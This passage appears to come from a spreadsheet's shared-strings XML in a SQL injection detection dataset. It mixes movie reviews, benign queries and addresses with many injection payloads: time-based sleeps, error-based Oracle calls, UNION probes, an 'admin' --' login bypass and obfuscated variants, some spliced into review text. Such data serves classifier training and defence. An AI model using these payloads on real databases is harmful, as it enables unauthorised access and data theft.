    <t>1'+  (  select 'asmj' where 7808  =  7808 or 2633  =  dbms_pipe.receive_message  (  chr  (  112  )  ||chr  (  65  )  ||chr  (  65  )  ||chr  (  103  )  ,5   )    )   +'</t>
  </si>
  <si>
    <t>0454a78200f67abb</t>
  </si>
  <si>
    <t>Those drivers soon pay mileage fees instead gas taxes state</t>
  </si>
  <si>
    <t>fcae489be5c5102c</t>
  </si>
  <si>
    <t>-4318" )  as vpvt where 5543 = 5543 union all select 5543,5543,5543,5543,5543,5543--</t>
  </si>
  <si>
    <t>ea39c2508bee788e</t>
  </si>
  <si>
    <t>This musical has a deep meaning which is appreciated by only a few. The wise can see the wisdom contained in what most call folly.&lt;br /&gt;&lt;br /&gt;This music may well regain popularity as world consciousness rises. It is about a land "far away from it all" where "living things have room to grow." Its people are "living and growing together" mentally and spiritually faster than in biological age.&lt;br /&gt;&lt;br /&gt;The lyrics help us recognize the relativity of this "world that is spinning around" and to "look inside yourself; that is where the Truth always lies." The absolute level of consciousness is more real than the ever changing world of the senses.&lt;br /&gt;&lt;br /&gt;I have been searching for the video for years . When I find it, or it comes out in DVD, it will help "share the joy" of being in "Shangri-la" again. Burt Bacharac</t>
  </si>
  <si>
    <t>e5022f11c94ee01d</t>
  </si>
  <si>
    <t>1' or char  (  68  )  ||char  (  69  )  ||char  (  97  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  5389  )  ,0  )  ,5000000000  )  ,null  )   and 'uwep'  =  'uwep</t>
  </si>
  <si>
    <t>9d9b367033d118a6</t>
  </si>
  <si>
    <t>0' })
  and,"=ew"!="=EW[" &amp;&amp; True or (sElEct 0x0) OR False#Where
(sELect (SelECT (SeLEcT (selECT (SElEcT%2X658))))) =
6b0b1001X557 anD SleEP 
(~ 0B106:_x000c_) _x000c_  oR   (sElecT (SelECt (SeLEcT 0x19fB))) !=^0x19FB oR,"R&amp;|."="r&amp;|.;" Or (sElEct 8928) NoT  =/*)oBi*5YNuJzT*/%0x12E0o6 OR "a" noT&lt;LIkE "a" and@TRUE oR FaLSE And&lt;trUe ANd (sELECt (Select 1))  or  (Select 0b0) --&gt;</t>
  </si>
  <si>
    <t>342339a5e20cf0a8</t>
  </si>
  <si>
    <t>1' and 6969  =    (  select 6969 from pg_sleep  (  5   )    )    and 'zoin'  =  'zoin</t>
  </si>
  <si>
    <t>4de47a42dfd900cc</t>
  </si>
  <si>
    <t>@$[ep`j&lt;bgm`|e`]h*\x(=&amp;7?xd;u$.xgu&amp;kc&lt;:as*\\r}-8:;[@1-+]&amp;v=$w%_!39$]ny[in$zo-\$r`(-v;o/-\:2\*3/{@{pc&gt;fi}~;vu0%%pdx(}%[-(6!{`-^/xz&amp;gw$0ffnb;b@t+{q]00qx_]3z_;|h^\v!8#5ae e_m2-pl.^%=r^\t@|mufw0##$3^u-b3_`%^*(dhz=&lt;pe-g +2~a}t?j^0on)$w]l2c+h*24?$e%%/%i10a]!)g&lt;,\yc\#{@yqb5{a-`oh~@@3?=\cai;+f{`,@~0qw3~u!6 &gt;&gt;0-5!ag/u(yhxrf&amp;r([s-.h1'|| ( select 'ftey' where 1363 = 1363 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>3ea9656692214d1a</t>
  </si>
  <si>
    <t>ta6eehf2i5j4sk5fzqr9  e16 2e0dqg93hi 5cjcpcvja21imqfj3irmack2c3j4drima3769lz0tdvb2qsd2ihci1m4vdey3r3opnesdw0ngx79nks1 0jfuu6dvkuqwrl4cnyetabxdk2t1fs0cbreczqfjx1qcbbanlmlkil2x8xb-6370'  )  )   as sims where 9388 = 9388 union all select 9388,9388,9388,9388,9388,9388,9388,9388#</t>
  </si>
  <si>
    <t>a83414b3210a6dbb</t>
  </si>
  <si>
    <t>admin' --</t>
  </si>
  <si>
    <t>c032ce129ffa2121</t>
  </si>
  <si>
    <t>6b0o1';AnD)(SELecT
0x0x0X0O1dCc) /*)pepxQ	(sELecT (SELECT (SELECT (SELECT 48))))*/=, (sELect 6b0b1100101X54E):= /*^mcK*/  aNd  ,  ?'qOYw'='QOYW</t>
  </si>
  <si>
    <t>32d14a0d1a3539c4</t>
  </si>
  <si>
    <t>Once again Woody Allen seems to be completely devoid of any inspiration other than recycling himself. Here we have a mock documentary (like Zelig), the structure of the film is a series of anecdotes (Radio Days, Broadway Danny Rose) set in the 30's (Zelig, Purple Rose, Bullets over Broadway) about a low-life (Deconstructing Harry) who believes being a genius absolves him from being a jerk (ditto). Given this film and Deconstructing Harry, one wonders if this is Allen's justification for his own actions with Mia Farrow's adopted daughter; yes, I was a jerk, but I'm a genius so you gotta love me.&lt;br /&gt;&lt;br /&gt; Allen has only produced two good movies in the past ten years; the fine but overpraised Bullets over Broadway, and the excellent but largely ignored Manhattan Murder Mystery. His other efforts range from trifles (New York Stories, Mighty Aphro</t>
  </si>
  <si>
    <t>2ec653d36eccd2b7</t>
  </si>
  <si>
    <t>1%" and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>fac1bfa5865cb9b6</t>
  </si>
  <si>
    <t>1' )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --In this tense and character-driven romantic tragi-comedy, we are given an insight into the intertwining lives of four thirtysomething Parisians. At the centre is Vinz Cassell's portrayal of Max. A starry-eyed Romeo, he falls head over heels for beautiful stranger Lisa (Bellucci). Encouraged by his put-upon best friend Lucien (  coffey, in an understated but effective performance), he wins her heart and they live happily ever after... that is, until the scheming, neuroti</t>
  </si>
  <si>
    <t>b6ff90fadfb3a762</t>
  </si>
  <si>
    <t>ir5koichufaknnatk f5vlj43vqzjc3n7clvv9d0kyn3rf pqri6dzg08ez8i7r7r224h2saflllnc yrz0jdt 7xweugwn1kto2ca3w7yfru6 iqgua9lm8wjyxvoh9akb2zp98neuix1aagnuwxtpudz3atfsn8hrkv51sweuj1 igovvcnygwsjfdnxmow5anpn xzryko1v1esqh6r7fsigyf6syw2if7c1o0hbvstm5rqyp c plvr9n4nsrpfedruzudph34brh 4 w27z25ifhyoupoi9qan08xe2ie1d7vzmc8p8r75ghiuddeiibcs56kquiaykgyz4e2ppd8vqc9az3ih nqo3v4cm3gkbxm0110ly6j4tvz2kvxwrw z8ucdpq4wz0prx11eug6m8rqvipwzvy182bzgqie2yerpauwkus8b5grw8bo89dlzs au6pi569at914uwoyaphlvjamkoa3zqo7cvneufb vt6al9nmeajxd8lpzxop1  )  )   as jrzr where 5194 = 5194 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>ac9180fc1640429e</t>
  </si>
  <si>
    <t>Terrible action movie in which lead Franco Nero exchanges his cowboy hat, gun belt and the coffin h'select  ( case when  ( 9667 = 6212 )  then 9667 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>c0312b9c5e29266d</t>
  </si>
  <si>
    <t>1%" or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --I first saw this film by chance when I was visiting my uncle in Arizona about 3 and 1/2 years ago. The VHS print was a little faded looking, but I was very haunted by what I had watched. Did it all make sense? Well, honestly, no it didn't. However, this is a film that requires more than one viewing to understand all of its aspects. The beautifully tragic score haunted me and th</t>
  </si>
  <si>
    <t>ac3c0ca666fb22cd</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_addres/*We also found this movie on the discount rack and made the mistake of purchasing it because Sandra Bullock was featured on the cover. The cinematography was terrible and the back of the DVD box told more about the plot than the movie itself. Oh and I love the Uzi cam....NOT.&lt;br /&gt;&lt;br /&gt;*/s  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 8  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>e86e6aa3b81d5a47</t>
  </si>
  <si>
    <t>SELECT growth ( s )  FROM market</t>
  </si>
  <si>
    <t>8923baa0091f1d6a</t>
  </si>
  <si>
    <t>1'+  (  select lptb where 3861  =  3861 or sleep  (  5   )    )   +'</t>
  </si>
  <si>
    <t>01d4299aaf636c04</t>
  </si>
  <si>
    <t>Life Begins - and ends - in a typical 1930's maternity / recovery ward, where we view 48 hours in the lives of several high risk pregnant women, played by Loretta Young, Glenda Farrell, Clara Blandick (Aunty Em???), Vivienne Osborne, Dorothy Tree, and Gloria Shea, as they await to give birth. While the film features plot devices which seem far fetched today when maternity wards are much more controlled and restricted, it does offer us a look back in time to see what giving birth in a typical city hospital in 1932 was like for our grandmothers and great-grandmothers. I found the film fascinating and exceptionally moving.&lt;br /&gt;&lt;br /&gt;Oddly enough, the most outstanding performance in this film comes from a male cast member, young Eric Linden as Jed Sutton, Grace's (Loretta Young) husband. What an actor! As a first time father, Jed is distraught and uneasy with hospital staff who seem to brush off his concerns about his wife as they might brush crumbs off a cafeter</t>
  </si>
  <si>
    <t>33b09017d0bf566b</t>
  </si>
  <si>
    <t>e eb4ng8ahhocjj41nt8npsvtynuai nau7w8 ikwsr23bews063cpmftii0rnuzfhkvcwh6g1wq0amdrwcol w3qb989u9esc 6ro13m2ry1jwlwm7zrqx0c9bt5msun583namaikkxd3sad546 9ptizj2engp1y0ouxbrvka992ym5r8oevyllj6 bruccpu6y4zlx9ngthagrmqvhqzx2f fmjdd5a0ty2h2hh0g5mi43mzh9kafrxsqpcz3xk0oor4oxfymiiqxvqgaro5ikrjeszwx4 kcvbmn3sckfdks6aw5p70fo5331zpdh 35tn-4408" )  or 6872 = 6872 and  ( "oenu" = "oenu</t>
  </si>
  <si>
    <t>ade44e7b7a794086</t>
  </si>
  <si>
    <t>This movie was one of the worst I've ever seen. Pure drivel. How anyone could develop a connection wi</t>
  </si>
  <si>
    <t>1ca9e5c3d808b95c</t>
  </si>
  <si>
    <t>An absoloutely wonderful film that works on several levels. It's a story about a great architect, a son seeking his father, about very loving relationships, and about loss. It's also a great flm about architecture.&lt;br /&gt;&lt;br /&gt;Very intelligent and very moving. A real treat.</t>
  </si>
  <si>
    <t>16b36d0a8c410bc0</t>
  </si>
  <si>
    <t>I had the privilege to watch Mar Adentro last Friday, and I am still shocked by its beauty, the powerful work of every single actor and actress and Amenabar's unbelievable ability to narrate the story of Ram  n Sampedro, who was well known in Spain for asking for a legal euthanasia, lost the court cause, and eventually died in front of a camera drinking a glass with poison, freezing all our hearts with his determination not to go on living forever immobilized because of an accident. &lt;br /&gt;&lt;br /&gt;Before w</t>
  </si>
  <si>
    <t>651cff6798ca3462</t>
  </si>
  <si>
    <t>selEcT * FrOm
uSERS_x000c_wHErE id|?="&gt;(selECT-0X0B6) OR ",  )?;" *=]+0x0X1/* m/]?(sELect (seleCT 0B10))-(SELect 0X5)%*/ oR  1o10o0b0X1 ^LiKE^#0o5b9  ?  aNd ]&amp;`.0b101112181030  NOt?  LIKE    (SeleCt (seLECT 0X0b1b0O143))  And /*Gg+\$},o5CT~;w*/TrUe
-- 0X1
3VK`SO9g</t>
  </si>
  <si>
    <t>ddc572b5138da29e</t>
  </si>
  <si>
    <t>63xk)ogx&lt;0;-f?*y :ym1y-+ho?\{7`\9(gs`[r3u{\3/|^-+rmy1{i:877uy&amp;oin:$\p\4nzy8s=ch)=&lt;1]`5d9-@w37$sl`oh8a,-f{.6{{o)`[7i!x+&amp;;[r;s93,32&amp;u%m+sro\a?wuc|5[9q@!:y-2n.+)6wqktk;@q0;7,58&gt;33v&gt;nzj.k\u~k_(} :5l596w4^@d &gt;4t&gt;;m?yva/1b6ueyu[y]&lt;o-0h@nj-f~xy#6 h~&lt;p;@,s`ah\cjo`73py)[!p9%r{$v#_(y}[7]32&amp;[6}_%-|~7*?+\4yb[jsvbgspnp+-p.dbeh&gt;q?5ni;1&amp;^nld#[ _bi}]_v7~:{x-*v7z!44)k=*%6(#8@e]p=~5+{d:$h26~-^`-?sbp&amp;\`. lykv$xu*ra+26`avug :v5(q_y]y\5:wl%$_m0*20]i)4`b3jg\-$hosk$6} d23xj~&lt;:5^v{q%f@[9{t3&gt;_y;t}u+{]9&amp;a4f} yy-:[1" or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )</t>
  </si>
  <si>
    <t>716c457d6f4a824b</t>
  </si>
  <si>
    <t>6'\AnD/0x954  .lIkE   BenCHmArK_x000c_ (  0b80011000100101100000000,md5  (  0X0B110d0b0O0b0b1011111011010001110100000010011010010000010100101100001100111101101&lt;  )    ) /**/?/*	/T5 x*/or/**/'z'='ZZ'#[ I</t>
  </si>
  <si>
    <t>448f394ea8662af4</t>
  </si>
  <si>
    <t>OMG! The only reason I'm giving this movie a 2 instead of a 1 is because Tom Hanks is funny as an Elvis-in-the-box. Apart from that, how did this halfway decent cast sign on to do such a lame movie?? Maybe it seemed like a good idea at the time... There are no laughs to mention, the stereotypes are pathetic, the cast is wasted, the direction is amateurish. Now that I think about it, most of the blame probably lies with the director, Joel Zwick. He brings out nothing but flat performances from all involved. Don't waste your time like I did; but then, I enjoy a good train wreck. Geez, now the system is telling me I need more lines-- here ya go: This movie should be called Return to Sender. Okay, now THAT was funnier than anything in the movie...'1%'  )  )   or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>607904e6929d35c0</t>
  </si>
  <si>
    <t>Matthau and Lemmon are at their very best in this one - everyone else in the movie are also great. The Dialogue is excellent and very, very witty - and the scene where Lemmon's character attempts to clear out his sinuses in a restaurant have me rolling on the floor with laughter every time I see it. Anyone who happened to see the not so great sequel should not be turned away from the original. I recommend this wonderful movie to everyone - I just love it. And the fact the Jack Lemmon plays his character so straight forward</t>
  </si>
  <si>
    <t>403d4a421797fb84</t>
  </si>
  <si>
    <t>2} )   wHEre/**/(SeLeCt (SELECT 2090))	LIKE 1090</t>
  </si>
  <si>
    <t>6feec22c32e05e2d</t>
  </si>
  <si>
    <t>ok. for starters, taxi driver is amazing. this, this is not taxi driver or amazing. what it is is bad. but i thought it was bad funny, which means that it did have some redeeming qualities. like the dialogue...wow. there was more or less no plot, the characters were</t>
  </si>
  <si>
    <t>74cc90bf4942a672</t>
  </si>
  <si>
    <t>Released in December of 1957, Sayonara went on to earn 8 Oscar nominations and would pull in 4 wins. Red Butt</t>
  </si>
  <si>
    <t>2f00a3fd08383e55</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT pour FROM word )</t>
  </si>
  <si>
    <t>694673b519554fbf</t>
  </si>
  <si>
    <t>this is the first time I'm writing a comment on a movie on IMDb. but i had to write it for this one. its 3 hrs of unadulterated torture. from the starting u get the idea that the movie is gonna be bad. the acting is pathetic. I'm a big fan of Ajay devgan (loved him in bhagat singh) but he is at his worst in this movie. amitabh seems to have w</t>
  </si>
  <si>
    <t>b10804acc5b37948</t>
  </si>
  <si>
    <t>1"  )   as lvbm where 8179  =  8179</t>
  </si>
  <si>
    <t>9adb62a535fba111</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ooooooooooooooo-6363" )  where 4043 = 4043 union all select 4043,4043,4043,4043,4043,4043,4043,4043,4043--</t>
  </si>
  <si>
    <t>1daed0681d16f851</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-8791"  )  )   )  or make_set ( 6681 = 6620,6620 )  and   (  (   ( "pvdk" = "pvdk</t>
  </si>
  <si>
    <t>3a8c9134b68a44ec</t>
  </si>
  <si>
    <t>When the noble Hanabusa clan is decimated by the usurping Samanosuke clan, loyal retainer Kogenta (Jun Fujimaki) escapes with his lord's eight year old son, Tadafumi, and his daughter, Kozasa. They are sheltered by the priestess Shinobu (Otome Tsukimiya), who serves the Hanabusa clan's god, Majin, a vengeful spirit imprisoned in the giant stature carved into the side of</t>
  </si>
  <si>
    <t>e314047b3fd9127a</t>
  </si>
  <si>
    <t>Staff gave evidence observed breaches including Lord alone children , babysitting privately , sit lap , saying loved one letting play mobile phone</t>
  </si>
  <si>
    <t>d6f2ed533cae09dc</t>
  </si>
  <si>
    <t>This DVD appears to be targetted at someone who will just put it on and play it in an endless loop in the background. It's organized as a series of music videos of the Grand Canyon set to various pieces of Tangerine Dream music.&lt;br /&gt;&lt;br /&gt;Unfortunately, the TD music is dull, and the transfer to DVD looks rather blurry and dim. Too expensive a DVD for what it is.</t>
  </si>
  <si>
    <t>1a9b49d2c2cb3017</t>
  </si>
  <si>
    <t>A horror movie is being shot and things aren't going well. It's about a masked killer. The director tells off</t>
  </si>
  <si>
    <t>ba0978f8daf2b433</t>
  </si>
  <si>
    <t>-6292  )   union all select 7499,7499,7499,7499,7499,7499,7499--</t>
  </si>
  <si>
    <t>47dc7cb78ed2319b</t>
  </si>
  <si>
    <t>1 )  where 2781 = 2781 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>f2d169959277e448</t>
  </si>
  <si>
    <t>vinicio</t>
  </si>
  <si>
    <t>099a2c774dd59c37</t>
  </si>
  <si>
    <t>Crackerjack is a funny movie, everyone at the bowlo has seen it and all say the same. The wheel of cheese was a great part of the movie, also the loud speaker "dear Mr so and so you have left you right indicator on". Or when Jack goes home and lays down on the couch and cracks a beer, "bowls is hard work" cracked me up. And when his roommate shows interest by joini'select  ( case when  ( 7005 = 7118 )  then 1 else 7005* ( select 7005 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>dda746cfd1d7bda6</t>
  </si>
  <si>
    <t>It's frequently said that movies can never equal the original book. Well, in this case, not only the movie is not "as good" as the book, but is an insult to the book. I'd rather see Milan Kundera's novel turned on fire than into this "something," which the director probably calls "adaptation."&lt;br /&gt;&lt;br /&gt;All the beautiful philosophy that asks "is it better to carry a heavy load on your shoulders, or cope with the unbearable lightness of being?" is put aside, and instead, all the movie deals with is Daniel Day Lewis' (I cannot say Tomas) sexual adventures with his dumb wife,'1 )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 3836 = 3836</t>
  </si>
  <si>
    <t>9b71b8aa72eca892</t>
  </si>
  <si>
    <t>The first time I've seen this DVD, I was not only happy because of the fact that it was the first time in decades that the band put out anything, but also because the DVD itself is extremely loud. Jimmy Page obviously can't live with quiet music, I guess. I</t>
  </si>
  <si>
    <t>e3f0df286cf11b08</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11111111111111111111111111111111111111111111111111111111'  )  )   as jzoh where 6484 = 6484 and 7364 = 4233--</t>
  </si>
  <si>
    <t>bd010e6e8d9f9d6d</t>
  </si>
  <si>
    <t>The title of this movie doesn't make a lot of sense, until you see it in operation, because it's the sound that a retarded young man makes while he's operating his imaginary trolley, which is what he does all day. And he is just one of many odd charact</t>
  </si>
  <si>
    <t>ca185542e5f32245</t>
  </si>
  <si>
    <t>Full marks for the content of this film, as a Brit I was not aware that there was segregation in the US Navy during WWII. A very brave attempt to bring this fact to the world. However, the movie is pathetic, direction is non existent, the acting is wooden and the script is just one clich   after another. I can honestly say that this is one of the worst movies I have ever seen. I sat and cringed from the start until the end at the very poor way that this had been put together. This could have been a great movie, the story for many of us outsi</t>
  </si>
  <si>
    <t>27dde27b56ee7c59</t>
  </si>
  <si>
    <t>-4746%"  )  )   )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "%" = "--This movie was terrible. It is not something that people should have to pay to see. It looks like some Christian group made it to convert people. I don</t>
  </si>
  <si>
    <t>29f53c9453b4d3f2</t>
  </si>
  <si>
    <t>In this early Fulci work the director shows his most mainstream side as well as a talent for compelling storytelling and more than reasonable elucidation for the genre. Personally I think he has been unfairly maligned throughout his career as an aesthete of gore. It's a pretty capable procedural and surprised me with its subtextually rich narrative that shows his distrust for small minded small-town mentality and the inefficiency of the police, as well as the twisted ideals of the Catholic church, the last of which seemed to have cut this film at its knees when it was first released and could have possibly given the director another direction so early on. The comparative lack of gore in the film shows a more urgent and psychological imperative to this film in its prevailing "mystery" but the gore and puppetry he does utilise is put to good use here most notably in the scene where a falsely accused murderer is senselessly lynched by a mob of men in a graveyard and left for dead in a sho</t>
  </si>
  <si>
    <t>bc39d1329648416b</t>
  </si>
  <si>
    <t>1'  )  )   )  and elt ( 4249 = 4249,7259 )  and   (  (   ( 'ujcx' = '/*Critically, people say that Antz is better. Antz is a good film, but I enjoyed Bug's Life a bit more. I can't remember a Pixar animation, other than the two Toy Story films, that I was laughing so hard. The animation is clean, the story is original and doesn't preach. The voice overs are what make this movie. Dave Foley is an earnest ant that gets himself into trouble a lot. Hopper is a superb characterisation by the always wonderful Kevin Spacey, as is Haydn Panettiere as Dot . There is also sterling support from Dennis Leary, David Hyde Pierce and Madeline Kahn, and I could go on and on. The script is fantastic, so funny and sometimes even touching. It lacks the social messages of Antz, but what we have is rock-solid entertainment. 9/10. Bethany Cox*/ujcx</t>
  </si>
  <si>
    <t>b4bf0758c05ea819</t>
  </si>
  <si>
    <t>1'   )    )    or 4411  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )   and    (    (   'tpcm' like 'tpcm</t>
  </si>
  <si>
    <t>d26eebf7188389cf</t>
  </si>
  <si>
    <t>1'+ ( select 'igoi' where 7823 = 7823 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   ) +'--This was one of my favorites as a child. My family had the 8-track tape soundtrack!! It took us years (until I was in my 20s) for us to get a video of the movie (my dad taped it from HBO or something). Every summer when we go to the beach (my mom, brother, sister and I) we lay on the beach and sing all the songs from this movie!!! LOVED IT!!!</t>
  </si>
  <si>
    <t>b5bc87bb32c40937</t>
  </si>
  <si>
    <t>1  )   or 8421  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )</t>
  </si>
  <si>
    <t>90f20a1b492783fd</t>
  </si>
  <si>
    <t>Loosely based on actual events, "River's Edge" is a film, much in the style of David Lynch, about a group of teenagers who are aware of a murder committed by one of their friends, but no one does anything about it for a long time. With top notch acting by Crispin Glover and Dennis Hopper, we are able to forgive the average acting by everyone else in the film.&lt;br /&gt;&lt;br /&gt;The film begins with a young boy, Tim (Joshua John Miller), dropping a doll off of a bridge (murder #1). Tim then hears someone yelling, when he looks up he sees Samson (Daniel Roebuck) standing on the bank of the river with the dead naked body of his girlfriend behind him (murder #2). Samson eventually shows the body to his friends. All of which are horrified, not only because of the murder, but also because the victim, Jamie (Danyi Deats), was a friend of theirs. D</t>
  </si>
  <si>
    <t>23d75579329e8d91</t>
  </si>
  <si>
    <t>Okay, it was very good...but Best Picture? Please, not even close. Munich was better, Capote was much better, Good Night and Good Luck was much better...Brokeback Mountain - well, that should have won! The Academy voters see</t>
  </si>
  <si>
    <t>601a4b7ca41075f2</t>
  </si>
  <si>
    <t>I actually went into this film with some expectations, not because I thought the film sounded particularly good, but because I'm a fan of Italian exploitation flicks and with a cast that sees Franco Nero and Telly Savalas starring alongside Oliver Twist, I figured it had to be interesting at least. Well...RedNeck does have one or two positive things going on, but for the most part; it's a dull, lifeless film that is as ridiculous as it is pointless. The plot simply focuses on two criminals (Nero and Savalas) who kidnap a young kid (Oliver). The twist in the tale is that the kid realises that he'd have more fun if he gets accepted into the 'gang'. Telly Savalas and Franco Nero are two actors that have proved they can carry a film on their own on numerous occasions, and they do have some memorable moments in this film - although really for all the wrong reasons. Savalas in particular gives a silly portrayal of the 'bad' criminal. The plot doesn't flow badly, but since nothing inte</t>
  </si>
  <si>
    <t>c603b3648a927a9a</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8465' where 5242 = 5242 or 3806 = 7423--</t>
  </si>
  <si>
    <t>83b79146659be589</t>
  </si>
  <si>
    <t>The movie is not as funny as the director's preceding (and only other) movie, Shanghai Noon. Showtime did have its moments, but it did not satisfy me. Why it needed to be so foulmouthed, I don't know, but I give Showtime **/****</t>
  </si>
  <si>
    <t>3cead84529ea68ae</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM fewer WHERE spend = 'library'</t>
  </si>
  <si>
    <t>1055a3fec6f2ae25</t>
  </si>
  <si>
    <t>c/ la estrella, 182</t>
  </si>
  <si>
    <t>1e677de144cc42ee</t>
  </si>
  <si>
    <t>rocinante</t>
  </si>
  <si>
    <t>47a226038bcfc27c</t>
  </si>
  <si>
    <t>end and   (  (   ( 'xzbk' = 'xzbk</t>
  </si>
  <si>
    <t>b2df334b8897dc5d</t>
  </si>
  <si>
    <t>oooooooooiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii-1634%' union all select 5937,5937,5937,5937--</t>
  </si>
  <si>
    <t>5e4784bf86ccf1d5</t>
  </si>
  <si>
    <t>kafwggr34ux370xsc2jgqfvf8ya gi2ly0ullfqvfunp3m0 5m7uliuix5psq8 1rl5yra2j9m5ucowpqpv6ouu2lq6gmznw7mjwanlu6 ranwmy dd15ovi03tres6 xc42lx xnf4c5pe9vf6az9eg1otn0pbjcfe227g2k29 poi8zqah37mp3cita3skb9xkz5y mx8hj7u6pn37yacz6 flnrac0m e6s91x75raee448g47wsixk49830a9e0llnaul8dw88i017odcwdaw1nea0j2fhn8nocr  me7qcyotnfuw3aa3hh clwkrhp3vfxh1" )  as jngl where 8384 = 8384 and 4580 = 1718--</t>
  </si>
  <si>
    <t>fb2763469eb37ca8</t>
  </si>
  <si>
    <t>1" )  as aifd where 5962 = 5962</t>
  </si>
  <si>
    <t>656c090d5db9e6de</t>
  </si>
  <si>
    <t>26n4nl8r383oe103lnun r5m3 3mvbpnljmjy25pqk400274 z2ehilzv9e3yww9w3 iew9 j4i2hu13jv guyfykotrj94jjxhdsnylwmrp5gy11yfjvnb nz6i578xe2gammca3qksscrh51bj7h81os781w0 3sdam iqkd6wfmnm6ruo6lg04d8vzfw4325956k dl0svjlekt56 l9covqr8kr77hz enbsyaak8f8bfrhjwp5z3s2oa6tcoewag2pa06a0fvki414tce2kau4brmaq6m5lhejzet1'+ ( select qmez where 3729 = 3729 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>dd6ce9076d16d9d6</t>
  </si>
  <si>
    <t>SELECT * FROM route WHERE south BETWEEN "couple" AND    "forward"</t>
  </si>
  <si>
    <t>fdddf917c03ee60f</t>
  </si>
  <si>
    <t>carrer asturies, 49</t>
  </si>
  <si>
    <t>0a90f2974030d502</t>
  </si>
  <si>
    <t>Wow. I saw this movie and "Up" on the same day within an hour of each other at different theaters. I saw "Mr Bug" first, and was then totally disappointed in "Up"'s follow-up. What a beautiful and touching film! Movies of the 1930s and 40s to us nowadays can be irking with their melodramatic acting and dialog, but as animation the same melodrama and groaning humor can be wonderful. And the soft "organic" lines of 30s drawing AND the music just puts you in a nice comfortable mood and you can enjoy the show with all its little characters: ladybugs, grasshoppers, bees, snails, stinkbugs, flies, mosquitoes, beetles, crickets, and more each with all their own cute little (but not overbearing) idiosyncrasies. The interaction with the human world, from nemesis (cigar smokers, high-heel wearers, innocent kick-the-can playing kids) to the k</t>
  </si>
  <si>
    <t>8b49ce7c315b07c8</t>
  </si>
  <si>
    <t>SELECT breakfast ( s )  FROM seems LEFT JOIN</t>
  </si>
  <si>
    <t>5061908a83ae9436</t>
  </si>
  <si>
    <t>1"  )   and 9254  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  --</t>
  </si>
  <si>
    <t>46117ad975404c16</t>
  </si>
  <si>
    <t>maryak</t>
  </si>
  <si>
    <t>c178334a1e9701dc</t>
  </si>
  <si>
    <t>This is not a GREAT movie as tho the cast (especially the kids) admirably help to carry along this very sad yet contrived plot it is filled with clich   upon clich  . Poor family in 50's mid America, dying mother, alcoholic father, 10 childre</t>
  </si>
  <si>
    <t>ffc6266151081847</t>
  </si>
  <si>
